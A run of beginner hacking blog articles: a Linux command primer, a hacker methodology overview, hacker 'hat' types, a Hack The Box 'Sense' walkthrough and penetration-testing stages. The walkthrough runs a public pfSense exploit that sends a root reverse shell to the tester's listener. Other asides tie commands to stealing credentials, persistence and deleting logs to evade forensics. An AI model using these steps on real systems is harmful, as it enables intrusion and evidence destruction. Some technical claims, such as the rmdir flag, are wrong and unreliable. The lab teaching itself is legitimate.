5. Red Hat Enterprise Linux (Commercial and costly 💰)

What’s Linux got to do with hacking?

A Guy Fawkes mask on a keyboard | Credit: Wallpaperflare.com

Linux is the choice OS of many hackers. Why, you may ask? Because it’s open-source, less prone to malware, lightweight, portable, and very compatible with multiple hacking tools.

Windows is a somewhat closed system so there are many things it doesn’t allow a hacker to do. Mac OS also isn’t that great either because of a lot of proprietary software. Linux has many distros to choose from and most can be modified as the user pleases without any restrictions.

A number of distros commonly used by hackers are Kali Linux, Parrot, BlackArch, and Archstrike. But don’t stop there, the options are unlimited.

As I mentioned earlier, Linux is also highly customisable. A great example of this feature is the desktop environment, which is a fancy name for how the desktop looks.

In Windows, there’s the basic taskbar, start menu, and a background with icons. It's nice that you can make slight modifications, and the feel changes with every new Windows version, especially with Windows 11. But Microsoft’s steps pale in comparison to the massive strides the Linux community has made when it comes to the way a desktop really looks and feels.

Common desktop environments include:

1. Gnome (The best 😎)
2. KDE Plasma (A Windows doppelganger)
3. Xfce (For geeks)
4. Mate (Hardware resource-efficient)

If you are into programming, you could build upon a current desktop environment released under the GNU license or develop your own desktop environment to suit your needs.

Tip: If you’re completely new to Linux, you might want to hold off a little before you replace your default OS. Many users are used to a GUI (Graphical User Interface) to carry out activities. But Linux users tend to use the CLI (Command Line Interface) more. This is simply because Linux is targeted towards developers and scientists, not the average user.

I personally suggest that you install a Linux distro on a hypervisor such as VirtualBox, and practice getting used to it. (I’m not suggesting VMware as it has a known vulnerability as at the time of writing). If you don’t know how to install Linux, you can learn it here.

Linux Package Management

Colourful Packages | Credit: Wallpaperflare.com

Linux is quite different from other OSs, which means that installing apps is also different. Short version? You’re going to download apps off the distro app store via the CLI (terminal). Now for the long version.

.exe and .msi installers (which you use to install applications in Windows) don’t work all too well in Linux. So the managers of a distro have servers that host multiple applications optimised for that particular distro.

With some commands in the terminal from you, and help from a package manager, your computer connects to the server, downloads applications, and installs them. You can also get system updates this way.

A package manager is software used to manage software that is downloaded and installed. You may have heard of at least one of the following package managers:

1. Apt (Linux)
2. Chocolatey (Windows)
3. MacPorts (MacOS)
4. Pip (Python)
5. Npm (Javascript)
6. Gradle (Java)
7. Composer (PHP)

Some .exe and .msi installers can work on Linux computers, but with a catch. A software called Wine adds a Windows compatibility layer to the distro to optimise it for Windows apps. Unfortunately, this doesn’t work for all applications.

Another alternative is to install Steam, or better still, SteamOS if you are a gamer with a flair for Linux 🎮.

Linux File Structure

Folders | Credit: Wallpaperflare.com

The Linux OS has a directory tree just like Windows. At the very top (or bottom, depending on your perspective), we have the ‘/’ folder. This would be like your C: drive in Windows. It houses all your directories, files and apps. Below it are other folders which are summarised in the pic below

The Linux file structure | Credit: Hackers-arise.com

Some important directories to take note of are:

1. /bin : binary or executable programs (nice place for keeping persistent scripts)
2. /etc : system configuration files (an awesome place to obtain credentials)
3. /home : home directory (the default current directory when you open up the terminal)
4. /opt : optional or third-party software
5. /tmp : temporary space, usually cleared on reboot (a great place to store enumeration scripts)
6. /usr : User related programs
7. /var : log files (the perfect place to frustrate a forensic analyst)

There is a lot more about Linux file structure and it probably deserves its own article, but this will do for now.

Now let's get a lot more hands-on experience in the terminal, and run some basic commands every hacker should know.

Intro to the Linux Shell

Unix and its various derivatives | Credit: Wallpaperflare.com

A shell is a text-based interface for controlling a Linux computer. Similar to Microsofts’ Powershell or cmd, it is the interface between the user and the kernel, aside from the GUI (Graphical User Interface).

There are various types of shells, each made with improvements based off previous ones, or optimised for a particular goal.

Shells are used a lot by hackers because they are the fastest and most efficient way to deliver instructions to a computer. The GUI is fine, but can be rather limited because some features cannot be accessed graphically, or the tool you want to use simply doesn’t have a graphical interface.

Some common shells include:

1. The Bourne shell (sh)
2. The GNU-Bourne Again shell (bash)
3. The Z shell (zsh)
4. The C shell (csh)
5. The Korn shell (ksh)

Quick lesson: The words ‘terminal’ and ‘shell’ are used interchangeably in the cybersecurity world and throughout this article. But, they are different. The terminal is the program that lets you access the shell via a graphical interface.

Basic Linux Shell Commands

In this article, we’ll go through the following commands: whoami, pwd, ls, cd, touch, cat, nano, operators, mv and cp, mkdir, rm and rmdir, stat, echo, grep, the ‘help’ flag and man pages.

You will need any Linux distro of your choice, though I suggest Kali. If you don’t know how to install one, you can read this article.

Open up the application called ‘Terminal’ and let’s begin. Shall we proceed? 🙃

How to use the whoami command

You use this command to check which user you are. On a personal computer, you are most likely to have only two accounts: the one created when installing the OS and root. If you are in the terminal as a normal user (account), you can try it out.

whoami

whoami | Credit: Mercury

If you want to be root, run the command sudo su and put in your password. Try whoami and the terminal will tell you root:

whoami as root | Credit: Mercury

Enterprise computers tend to have many users on one computer. As I stated in a previous article, each has various permissions, some more than others. When you gain initial access post-exploitation, you usually start of with a standard account. If you want to check if the name of the compromised account, use this command.

How to use the pwd command

The Present Working Directory (pwd) command informs you of where you currently are in the directory tree. By default this usually is the home directory.

pwd

Present Working Directory | Credit: Mercury

If you are a beginner, it's quite normal to be lost in the directory tree and suddenly lose track of where you are. This command helps you to keep track of things.

Depending on your distro, you may see a ~ symbol when you open the terminal. That is the symbol for the default home directory for the user. It’s like the C:\Users\<default_user> folder in Windows, containing all user-specific files. In Linux, it will be as the format above /home/<default_user>.

How to use the ls command

You use the ls command to list the contents of a directory. It lets you know what files are inside a directory without a GUI.

When used with flags, it’s a Swiss army knife, with various ways of showing what’s in the directory.

Common flags you might want to take note of are -l (long listing), -a (all aka show hidden files), and -c (show recently modified).ls.

Listing | Credit: Mercury

Flags are features of applications/tools that allow you to tell them what to do. Let’s look at the -l flag for ls as an example. Long listing is a feature and can be activated by using the command ls -l .

Long listing | Credit: Mercury

As you can see, running ls with the flag differs from just plain old ls. I’ll explain the extra details in another article, or you can go ahead and do some research yourself into what they are.

How to use the cd command

You use the Change Directory (cd) command to transverse across the directory tree.

cd <directory>

Changing directory | Credit: Mercury

If you run the command ls -a, you will notice that there are two files that are always there no matter the folder: . and .. . The . file represents the current directory and the .. file represents the parent directory (the directory above the current one).

How to use the cat, more, and less commands

All the commands above are output commands. You use them to display the content of files to the terminal.

But there are notable differences here. cat is commonly used for files with small amounts of text. less and more are likely to be used for files with large amounts of text and output can be controlled with the arrow keys.

cat <file_name>
more <file_name>
less <file_name>

cat vs more vs less | Credit: Mercury

You will notice that cat prints the output directly to your terminal, while more and less allow you to use the arrow keys. Output commands are used to gather information and credentials from compromised systems.

How to use the touch command

You use the touch command to create files. You can write to these files in a number of ways, such as using a text editor or piping input into it (more on that later).

You can make a file using the following syntax:

touch <file_name>

You can then use the ls command to check if your file has been created.

Creating a file | Credit: Mercury

How to use the nano command

Nano is a popular built-in text editor in Linux. It’s very common because it's easy to use and it's supported in many CLI environments. Other common text editors are Vim (very annoying 😫) and gedit (as simple as Notepad 🙃).

You can edit a file with the following command:

nano <file_name>

The nano interface | Credit: Mercury

There are some commands below the Nano interface that can aid you. ‘^’ simply means the Ctrl button and the ‘M’ button is Alt. ‘^S’ (or in this case Ctrl + S) is used to save the file after you write stuff to it. The nano command is used by hackers to change information in files, edit logs, or if you are a red hat hacker, delete essential configuration file lines.

Command Chaining Operators

‘Chaining’ commands is the concept of writing multiple commands together and executing them in a variety of ways. You usually do this with the use of special characters. Examples include:

1. Ampersand (&): To run a program in the background
2. Logical AND (&&): The following command will run only if the previous one successfully ran
3. Pipe (|): The output of the previous command acts as input for the next command
4. Overwrite (>): Overwrites the content of a file with the output of the previous one
5. Append (>>): Appends the output from the previous command to a file

If you don’t understand how all these work, don't worry. They are usually run with other commands I’ll mention later in the article.

How to use the mv and cp commands

These are two commands that are quite similar but have notable differences. You use mv to move a file to another location. You use cp to copy a file to another location.

mv <file_name>
cp <file_name>

Examples of cp and mv | Credit: Mercury

There isn’t a command for renaming files in Linux, so most people use the mv command by using this syntax:

mv <original_file_name> <new_file_name>

Try it yourself to get a feel.

How to use the mkdir command

The mkdir command makes directories. You could use this to make a custom directory that only you can access on a compromised system to keep scripts or tools for persistence.

mkdir <directory>

Making a new directory | Credit: Mercury

How to use the rm and rmdir commands

You might be able to figure this one out yourself. rm is the command to remove files, and rmdir is the command to remove directories.

rm <file_name>
rmdir <directory>

rm, rmdir and rmdir with the ignore-fail-on-non-empty flag | Credit: Mercury

Linux is not too keen on getting folders deleted if they are not empty. To account for this, use the ignore-fail-if-non-empty flag to delete both files and directories.

Do note that you'll need to be extremely careful with these commands as they do not send the deleted files or directories to the Trash/Recycle bin. They're just gone.

How to use the stat command

You use the stat command to give information about a file.

stat <file_name>

stat | Credit: Mercury

You can gather information about the file name and extension, permissions, when it was made, modified, last accessed and much more.

Now is a great time to learn about permissions. If you run the commands ls -la or stat, you may see something like this: drwxrwxrwx. Let’s break it down.

Permissions demystified | Credit: unix.stackexchange.com

The read (r) permission allows you to see the contents of a file, the write (w) permission allows you to modify the file, and the execute (x) permission allows you to run it as a process if it is a script or executable.

There are 3 classes of users that can access a file: a user, group and others. The root account is another class but that’s exempted here.

Each ‘rwx’ set is owned by a permission class. If the space reads a letter, the set has that permission. If it has a dash, they do not have permissions.

What about the ‘d’ at the front? That represents if it is a directory or a file. The ‘d’ means it’s a directory, and if it’s a dash (-), it's a file. Though, technically, a directory is a special type of file. But that’s a story for another day.

How to use the echo command

You use the echo command to print out input. Let’s use an example to make things clearer.

echo "<text>"

As you can see, you can use echo with the > operator to write text to files.

How to use the grep command

Let’s take things up a notch. You use the grep command to extract specified text from a file using the pipe operator.

grep "<text>"

grep | Credit: Mercury

The command above isn’t as complicated as it first seems. We tell the computer to print the contents of a file, and using the pipe operator, tell the grep command to use it as input. This is called piping one command through another and can be done multiple times. The found text is shown in red.

grep is commonly used to look for certain texts in large files. A practical example would be if you are looking for credentials for a specific user in a file with a lot of text. You could use grep to look for words like ‘password’, ‘login’ and other keywords that you think would be around the credentials you are looking for.

How to use the ‘help’ flag and man pages

Last on our list are ‘help’ and man. The ‘help’ flag isn’t necessarily a command but it is a great aid if you are confused about an app or tool. Simply use the following:

<app or tool> --help

This will get quick, bite-size information about it. man, on the other hand, gives you all documented information about the app.

man <app>

help vs man | Credit: Mercury

You may notice that in the gif, I used -h. That’s because its the short form of the flag. Some flags have short forms. If it starts with a single dash, that’s the short form. If it starts with two dashes, it’s the long form.

How to Update Your Linux

This entire section can actually be done with a single command but let’s break it down to understand the whole thing. The task: update your OS. In order to achieve the objective, you need to do two things.

1. Update the local repository info: Think of this like checking for updates before actually downloading and installing them.
2. Upgrade the system: As it says, we download the updates, and then install the updates.

The first command to run is:

sudo apt update

• sudo: To indicate we are running the command with higher permissions
• apt: The package manager
• update: To tell the computer to update its local information about the repository

After you punch in this command, you type in your password, and voilà. As you will observe, your computer will download information from the repositories on what packages (applications) to update.

I’ve already updated my own so it looks like the one below. But if this is your first time, it should take a few minutes.

sudo apt update | Credit: Mercury

When that is over, you can run the next command to download and install the updates:

sudo apt full-upgrade

sudo apt full-upgrade | Credit: Mercury

Note: You can interrupt the package download process, but never the installation process. That might break your OS and make it unusable.

During the upgrade you may notice some irregularities, such as the one below:

Scrambled upgrade | Credit: Mercury

Don’t worry, your computer isn’t going to blow up in your face or anything 😂. It’s just a bug. After the upgrades have finished installing, you will want to reboot your computer. This will allow your laptop to fully implement all updates.

My personally customised desktop | Credit: Mercury

Congratulations 🎉. You have successfully updated your system. Remember how I said all this could be done with one command? Here it is. 👀

sudo apt update && sudo apt upgrade -y && reboot

Relax, it's not as complicated as it first seems. Take a look at the code bit by bit. The only unfamiliar pieces are the && symbols.

As I mentioned earlier, they are logical AND operators. This simply tells the computer to run the first command before, finish up, and then carry out the one after it. The -y flag tells the computer to carry out the upgrade without user input.

So the command above tells the computer to first update, then upgrade, and finally, reboot. Easy-peasy right? 😎

Conclusion

Tux the Godfather ¦ Credit: Wallpaperflare.com

Let's do a quick recap of what you've done:

1. We've had a tour of the Linux OS
2. We've learned about package management in Linux
3. We've reviewed the Linux file structure
4. And we've run a few commands on the Command Line Interface

And on that note, we have come to the end of this article. I hope you enjoyed it. And as I always say, happy hacking! 🙃

Linux Resources

1. You can read more about chaining commands here
2. Here's a brilliant video on package management.
3. And here's a quick introduction to the Linux file structure.

Acknowledgements

Thanks to Anuoluwapo Victor, Chinaza Nwukwa, Holumidey Mercy, Favour Ojo, Georgina Awani, and my family for the inspiration, support and knowledge used put this post together. You guys are awesome.

In this article, you will learn what the hacking process really looks like. And hopefully one day, you'll get to say those famous words: “I’m in”.

Disclaimer: This is for educational purposes only. Please (with a cherry on top), do not use this knowledge to perform illegal activities. I might be one of the white hats to put you in jail someday 🙃. Thank you.

How do Hackers Hack?

Tony Stark attempting to hack S.H.E.I.L.D | Credit: animatedtimes.com

Since you are reading this article, I’ll assume that you already know the basics of what hacking is, so let's jump right in.

There really is no general agreed upon process of hacking, in part because there are a few different types of hackers. But, I will tell you the steps the majority of hackers (and I myself) follow.

They are:

1. Reconnaissance
2. Enumeration
3. Exploitation
4. Privilege Escalation
5. Post Exploitation
6. Covering Tracks
7. Report Writing

We'll go through each one in detail so you get a good feel for the process.

If you want to dive deeper and learn more about what white hat (ethical) hackers do, check out this course.

Reconnaissance

A neon themed hollywood hacker | Credit: Wallpaperflare.com

Recon (aka footprinting) is the first, longest, and most important step. This entails getting as much information as you can about the target without interacting directly with the target.

Basic OSINT (Open Source Intelligence) skills are a hacker's best friend here.

Quick lesson: OSINT is the collection and analysis of information from public sources in order to gain actionable intelligence. National security agencies, investigative journalists, and hackers legally gather such information in order to create measures, stories, and dossiers, respectively, about targets.

You can find the OSINT framework guide here.

The greatest resource for recon is the Internet, and the greatest tool is the search engine, Google. To make this a lot easier, Google dorking would be a good place to start. Dorking in this sense means the use of advanced search techniques to find out more information about a target that you normally wouldn’t be able to find using normal methods.

Other resources for recon include:

1. Wikipedia (The biggest encyclopedia to this date)
2. Social Media such as Instagram, Twitter, and Facebook (Best resource for social engineers)
3. who.is (To get information about a website)
4. sublist3r (Lists subdomains publicly available)
5. Media such as newspapers, radio, and television

Enumeration

Magnifying glass over binary ID fingerprint | Credit: Wallpaperflare.com

This is like reconnaissance, except you gain information about the target by interacting with it for the purpose of looking for a vulnerability.

Do note, though, that things can get a lot riskier as the target could discover that you are trying to find out information about them, and could put countermeasures in place to hinder you.

Network enumeration involves port scanning and network mapping. This helps you learn about the target’s operating system, open ports, and services being run, along with their version. Nmap (network mapper), burp suite, and exploit-db/searchsploit are common tools you can use for network enumeration.

Tip: Knowing the version of services is a great way to find a vulnerability. Old versions of software may have a known vulnerability which could be on the exploit-db site. You could then use this to perform an exploit.

Physical enumeration involves gaining information through physical means. This could be done via dumpster diving (getting credentials and confidential information from the trash) and social engineering.

Social engineering is quite a broad topic and will get an article of its own later. However, in simple terms, it means hacking humans using manipulative social skills.

Exploitation

A fake terminal access | Credit: Wallpaperflare.com

Exploitation involves gaining access to the target successfully using a vulnerability discovered during enumeration.

A common technique for exploitation is to deliver a payload after taking advantage of the vulnerability. In simple terms, this is finding a hole in the target, and then running code or software that lets you manipulate the system, such as a bash shell.

Infamous vulnerabilities that are commonly exploited are EternalBlue (Windows) and the Apache log4j (web servers) vulnerabilities.

Common tools you can use for exploitation include:

1. Metasploit (The big gun 🔫)
2. Burpsuite (For web applications)
3. Sqlmap (For databases)
4. Msfvenom (Used to create custom payloads)

Quick lesson: A payload is software run after a vulnerability has been exploited. Once exploited, the target computer doesn’t have anything to give you access with. And so you need a payload to give you access and allow you to manipulate the target.

A very common payload many hackers use is meterpreter. It is a payload by metasploit that allows you to easily transverse the hacked computer.

Privilege Escalation

Random Text with “Administrator” | Credit: Wallpaperflare.com

In order to understand privilege escalation, you need to grasp two concepts:

1. User Accounts
2. Privileges

A User Account is a profile on a computer or network that contains information that's accessed via a username and password.

There are two kinds of user accounts: Administrator account and Standard account. Home computer users usually only have one user account, which is the administrator. In contrast, organisations have multiple accounts on a network or computer, with a system administrator having the administrator account and the basic employees having various standard accounts.

Privileges are the permissions that let you write, read and execute files and applications. A standard user doesn’t have privileges (permissions) to critical files and applications which we want. However, an administrative account will have privileges for everything.

Escalation is the movement from one user account to another. This could either be vertical or horizontal.

Vertical escalation is when a hacker moves from an account with fewer privileges (standard account) to an account with more privileges (administrative account).

Horizontal escalation is when a hacker moves from one user account to a similar account of the same privilege level in hopes of performing vertical escalation with the new compromised account (standard account to standard account).

The administrative user accounts you would want to target are root (Linux) or Administrator/System (Windows). These accounts have all the privileges and are practically a goldmine if you get access to them, as you can take absolute control of the computer.

Techniques to perform privilege escalation include:

1. Password spraying (Reusing passwords)
2. Cracking password hashes (Finding passwords of other users)
3. Finding ssh keys (Used for horizontal escalation)
4. Abusing SUID binaries (Taking advantage of misconfigured privileges in Linux)
5. Running tools scripts to look for escalation routes (enum4linux is nice and PEASS-ng has a great suite)

Post-Exploitation

Code with text “malicious virus” | Credit: Wallpaperflare.com

Usually, white hats skip over to the very last step. But I will include this and the next for the sake of knowledge.

Post exploitation is the use of tools with the aim of gaining persistence and obtaining sensitive information from the target computer.

This could be done in a number of ways including:

1. Installing a permanent backdoor, listener, or rootkit
2. Installing malware such as viruses and trojans
3. Downloading intellectual property, sensitive information, and Personal Identifiable Information (PII)

Covering Tracks

An Anonymous themed background | Credit: Wallpaperflare.com

This is as simple as it gets, but can be incriminating if there is even a slight mistake. A malicious hacker has to be careful to not leave behind files, scripts, or anything that can be used by a digital forensics expert to track the hacking back to them.

Some basic things to do would be to delete log files and the history file in Linux. The meterpreter payload even has a feature to delete all logs on the Windows Event Manager.

Reporting

Digital report writing | Credit: Wallpaperflare.com

This is the final step of the hacker methodology. It involves writing down a basic rundown of the entire process you went through above.

There are various formats, but a basic one will include:

1. Vulnerabilities found and their risk level
2. A brief description of how the vulnerabilities were discovered
3. Recommendations on how to remediate the vulnerabilities

Tip: Note taking when hacking is very important. I personally learned this the hard way when doing CTFs (Capture The Flag).

Not only does it make it easier when writing reports, but they also allow you to avoid repeating failed attempts and sort through information easily. They also let you look back on what you’ve done later on. Taking screenshots is also a great idea.

Conclusion

Alright so let's do a quick recap of the hacker methodology:

1. Reconnaissance
2. Enumeration
3. Exploitation
4. Privilege Escalation
5. Post-Exploitation
6. Covering Tracks
7. Report Writing

Resources to help you practice:

1. Test your knowledge on the hacker methodology
2. Tips on how to protect yourself from hackers
3. More information about OSINT

Acknowledgements

Thanks to Chinaza Nwukwa, Holumidey Mercy, Georgina Awani, and my family for the inspiration, support, and knowledge used put this post together. You guys are the best.

Well, in this article, you will learn how hackers are classified by comparing them to a Marvel or DC hero that more or less represents them and what they do.

What is a Hacker?

Hats on Silhoettes | Credit: Wallpaperflare.com

A hacker is an individual who uses their skills to breach cybersecurity defences. In the world of Cybersecurity, hackers are typically classified by a ‘hat’ system. This system likely came from old cowboy film culture where the good characters typically wore white hats and the bad ones wore black hats.

There are 3 major hats in the cyberspace:

1. White Hats
2. Grey Hats
3. Black Hats

However, there are some others that have also cropped up over time such as:

1. Green Hats
2. Blue Hats
3. Red Hats

Let’s dive in and learn what all these different types of hackers do, shall we? 🙃

White Hat Hackers

Captain America | Credit: Wallpaperaccess.com

White hats are just like Marvel’s Captain America 🛡️. No matter the day, time, or age, they always stand up for what’s right and protect civilians and organizations at large by finding and reporting vulnerabilities in systems before the black hats do.

They usually work for organizations and take roles such as a Cybersecurity Engineer, Penetration Tester, Security Analyst, CISO (Chief Information Security Officer), and other security positions.

Under these organizations they perform tasks such as:

1. Scanning networks
2. Configuring IDSs (Intrusion Detection Systems)
3. Ethically hacking computers to find vulnerabilities and report them so they can be addressed
4. Programming honeypots (Traps for the attackers 😼)
5. Monitoring network activity for suspicious activity

Famous examples of such hackers include:

1. Jeff Moss (DEF CON founder)
2. Richard Stallman (Founder of the GNU project)
3. Tim Burners-Lee (Creator of the World Wide Web)
4. Linus Torvalds (Creator of Linux)
5. Tsutomu Shimomura (The man that caught Kevin Mitnick)

And if you want to hear more from the founder of a cybersecurity company herself, check out this podcast featuring Rachel Tobac.

Grey Hat Hackers

Batman | Credit: Alphacoders.com

DCs’ Dark Knight and grey hat hackers have a lot in common 🦇. They both want to stand up for the right thing but use rather unconventional methods to do so.

Grey hat hackers are the balance between white hats and black hats. In contrast to white hats, they do not ask for permission to hack systems but do not perform any other illegal activities like black hat hackers.

Grey hats have quite a controversial history. This makes them hard to really classify, especially if their moral compass goes a little haywire down the line or what they did seems more black hat-ish than white hat-ish. Some even end up in jail for what they do.

But there are some that rise to be the heroes of the people and the enemy of the government and big organizations.

Some (in)famous examples of grey hat hackers are:

1. Anonymous (World famous hacktivist group)
2. HD Moore (Creator of Metasploit)
3. Adrian Lamo (aka the homeless hacker)
4. Khalil Shreateh (Hacked the facebook account of Mark Zuckerburg 🤣)

Black Hat Hackers

The Joker | Credit: Wallpapersden.com

Time to introduce the harmful lot 🃏. The Joker and Black Hats are like peas in a pod. They perform illegal activities for financial gain, the challenge, or simply for the fun of it.

They look for computers that are vulnerable over the internet, exploit them, and use them to whatever advantage they can.

Black Hats use techniques for getting into systems just like white hats. However, they don’t use their defensive skills – rather, they up their game on the attack by doing things such as:

1. Installing backdoors
2. Maintaining access to compromised systems
3. Performing privilege escalation
4. Downloading private/sensitive/intellectual data
5. Installing malware such as ransomware
6. Creating phishing emails and links

Examples of infamous black hats include:

1. Kevin Mitnick (Most wanted cybercriminal in U.S history)
2. Julian Assange aka Mendax (Creator of Wikileaks)
3. Hamza Bendelladj aka Bx1 (Latter owner of the ZeuS Banking Malware)
4. Kevin Poulsen (Dark Dante)
5. Robert Tappan Morris (Creator of the morris worm)

Mitnick, Poulsen, and Morris were criminally charged, served their sentences, and are good guys now. Mitnick founded a cybersecurity company. Poulsen created SecureDrop. And Morris became a professor at MIT (Don’t you just love a happy ending? 🤧).

Green Hat Hackers

Ms Marvel | Credit: Wallpapercave.com

Ms Marvel and Green hats are a match made in heaven 🌟. They are both young, enthusiastic, inexperienced and have the tendency to take risks and learn from their mistakes. Green hats are hackers that are new to the industry but are willing to learn to become great hackers.

Because of the availability and easy of use of hacking tools these days, it's pretty easy for a green hat to end up in trouble as they may not fully understand the full workings of the tool or target. But, they learn from their errors to gather experience.

Green hats may upgrade to White, Grey, or Black Hat hackers as they continue to move up the ranks.

Blue Hat Hackers

John Wick | Credit: Wallpaperswide.com

Okay, I know. John Wick isn’t a part of either DC or Marvel but Dynamite Comics’ greatest hitman is a favourite of any fan 🐶.

Mr Wick and Blue hat hackers share the same ideology: Revenge. You kill John Wicks dog, he’ll come after you. You bully or threaten a blue hat, they will also come after you, except it's your digital life on the gallows.

But due to what I can only guess to be cultural differences, a blue hat could also mean an external security professional brought in to test software for vulnerabilities prior to its release.

Red Hat Hackers

The Punisher | Credit: Wallpaperflare.com

I think the character says it all ☠. The Punisher is a ruthless anti-hero that stands up for what is right but is never ever (and I mean ever 😬) going to give criminals second chances.

Red hats are the same. They target cybercriminals and damage whatever they can to disable criminal activities, permanently.

Red hats are hackers no one wants to mess with, not even a black hat. Other hackers usually attack Microsoft Windows computers but these hackers, they hack Linux computers.

They have no regrets, don’t think twice, and make black hats pay rather severely for their crimes by taking justice into their hands. They do this by destroying all data and backups of their target, and usually render the system useless.

Conclusion

And on that terrifying note, we have come to the end of this article. I hope you enjoyed it. And as I always say, Happy hacking! 🙃

Acknowledgements

Thanks to Chinaza Nwukwa, Holumidey Mercy, Georgina Awani, and my family for the inspiration, support and knowledge used put this post together. You guys are amazing.

Helpful Resources

1. What is a honeypot?
2. Many more classifications of hats

It contains several challenges that are constantly updated. Some of them simulate real world scenarios and some of them lean more towards a CTF style of challenge.

Note: Only write-ups of retired HTB machines are allowed.

Sense is fairly simple overall. It demonstrates the risks of bad password practices as well as exposing internal files on a public facing system.

We will use the following tools to pawn the box on a Kali Linux box:

• nmap
• dirbuster
• searchsploit

Let's get started!

Step 1 - Reconnaissance

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

Port scanning

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing.

It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

I use the following command to perform an intensive scan:

nmap -A -v 10.10.10.60

-A: Enables OS detection, version detection, script scanning, and traceroute

-v: Increases verbosity level

sense.htb:** hostname for the Sense box

If you find the results a little bit too overwhelming, you can try this:

nmap 10.10.10.60

We can see that there are 2 open ports including:

Port 80, most often used by Hypertext Transfer Protocol (HTTP)

Port 443, standard port for all secured HTTP traffic

Directory scanning

Still in the scanning and reconnaissance phase, I now use DirBuster. DirBuster is a multi threaded Java application designed to brute force directories and files names on web/application servers.

You can launch DirBuster by typing this command on the terminal:

dirbuster

or by searching the application:

Old Kali

New Kali

The application looks like this, where you can specify the target URL. In our case it will be https://10.10.10.60. You can select a wordlist with the list of dirs/files by clicking the Browse button:

I use the directory-list-2.3-medium.txt for this search. We can see some interesting files here:

Step 2 - Visiting the files we got from the recon phase

Let's navigate to the changelog.txt file. We're getting more information around some security changelog, including patching vulnerabilities and timeline.

Another interesting file is system-users.txt which does contain a username and an indication for the password.

Step 3 - Visiting the web page

Let's navigate to the website. We see a pfSense panel.

pfSense is an open sourcefirewall/router computer software distribution based on FreeBSD. It is installed on a physical computer or a virtual machine to make a dedicated firewall/router for a network. It can be configured and upgraded through a web-based interface, and requires no knowledge of the underlying FreeBSD system to manage - Wikipedia

https://www.pfsense.org/

Let's Google to see if we can find the default username and password for pfSense. Bingo! We do find some documentation on Netgate Docs.

https://docs.netgate.com/pfsense/en/latest/solutions/m1n1wall/getting-started.html

I try the username Rohit and the password pfsense on the login page and I'm in! I have a look at the dashboard and other information I could gather. We can see which specific version we're on - 2.1.3-RELEASE (amd64).

Step 4 - Looking for an exploit

I use Searchsploit to check if there is any known exploit. Searchsploit is a command line search tool for Exploit Database.

I use the following command:

searchsploit pfsense

I get more details on an exploit with:

searchsploit -x 43560.py

You can also check the Exploit Database to find the same exploit.

https://www.exploit-db.com/exploits/43560

I get more information with:

searchsploit -p 43560.py

I can see where it is located on my Kali box. I copy the file in my Sense folder with:

cp /usr/share/exploitdb/exploits/linux/remote/43560.py .

and to check if it has been copied in this folder:

ls -la

On one terminal (right side) I set up a listener with:

nv -nvlp 1234

I then set up the exploit (left side) with:

python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.13 --lport 1234 --username rohit --password pfsense

I got a shell as root!

I start gathering some basic info. id returns the real user ID of the calling process.

Step 5 - Looking for the user.txt flag**

I navigate to the rohit folder from home.

I can list all the files/folders with the following command:

ls -la

I then move to the home folder with:

cd home

And I find the user flag! I check the contents of the file with:

cat user.txt

Step 5 - Looking for the root.txt flag

Let's find the root flag now. I navigate up to root.

I find the root.txt file and check its content with:

cat root.txt

Congrats! You found both flags.

Remediations

• Do not store sensitive information such as login credentials or your patching status on a plaintext file on the webserver
• The pfsense application should be patched to latest
• Make sure to change the default password when you're setting up new applications/servers/platforms
• Apply the principle of least privilege to all your systems and services

Please don’t hesitate to ask questions or share with your friends :)

You can see more articles from the series Keep Calm and Hack the Box here.

You can follow me on Twitter or on LinkedIn.

And don't forget to #GetSecure, #BeSecure & #StaySecure!

In this article, we'll discuss the five steps involved in a successful penetration test.

Before we get into the article, a quick disclaimer: I would like to emphasize that I am not responsible for any damage you do trying to attack systems.

It's illegal to pen test without permission, so make sure you have it in writing before you even try to scan a system or a network.

With that out of the way, let's get started.

What is Cybersecurity?

Cybersecurity is one of the hottest fields to be in, thanks to so many companies going remote. Cyber threats are increasing and cybercriminals are finding new ways to exploit systems.

Penetration testing is how ethical hackers work. They think like bad hackers and attack their own systems. This helps them understand their strengths and weaknesses and protect their organizational assets.

A pen-test is comprised of multiple stages. You cannot simply get into a system by using a tool unless the target is hopelessly vulnerable.

In most cases, systems are secured via firewalls, antivirus software, default operating system configurations, and so on. It takes the right tools, a strong skill set, and most importantly, patience, in order to successfully exploit a network.

So let's look at the five main stages a penetration tester will go through along with the tools they use to break into a network.

You can also find the article I wrote on the top 10 tools cybersecurity professionals use here.

Reconnaissance

"Give me six hours to chop down a tree and I will spend the first four sharpening the axe." — Abraham Lincoln

Reconnaissance is the most important part of a penetration test. It is where you gain information about the target.

Reconnaissance is important because the more information you have about the target, the easier it gets when you try to gain access. Once you map out an entire network, you can identify the weakest spot and start from there.

Commonly used recon tools include Google (yeah!) and social media sites where you can gather information about the target. If you are performing an audit of a company, you can go through the company’s job postings to see the type of technologies they use.

Once you have gained enough information, you can use a tool like Maltego to map the targets.

Maltego

Maltego also supports has the ability to automatically import data from social networks, DNS records, and custom plugins like FullContact.

The important thing to remember in terms of recognisance is that you NEVER touch the target. Reconnaissance is similar to scouting and looking for information while you are far away from the target.

Scanning

This is the part where you come in contact with the target. Scanning involves sending packets of data to the target and interpreting their response.

Scanning gives you useful information about the target like open ports, IP addresses, operating system information, services installed, and so on.

Nmap is the best scanner to scan a network. It will help you map out the network and provide detailed information about the target systems.

Nmap

Nmap also provides a number of CLI options including scan exports that you can then import into exploitation tools.

Nessus is another scanning tool, but it is a commercial product. While Nmap will give you information about the target, Nessus will tell you how you can exploit the target by matching the vulnerabilities from the Common Vulnerabilities and Exposures database.

OpenVas is another open-source alternative that is similar to Nessus.

Exploitation

This is the part where you gain access to the system. A successful exploit should give you control of the system to at least a user level. From there you perform privilege escalation to gain root access to the target.

When it comes to exploitation, Metasploit is hands down the best tool in the market. It is open-source (with a commercial version as well) and is easy to work with.

Metasploit

Metasploit is updated frequently with new exploits published in the Common Vulnerabilities and Exposures (CVE) database. So you can match your scan results with the available exploits and use that exploit from Metasploit to attack the target.

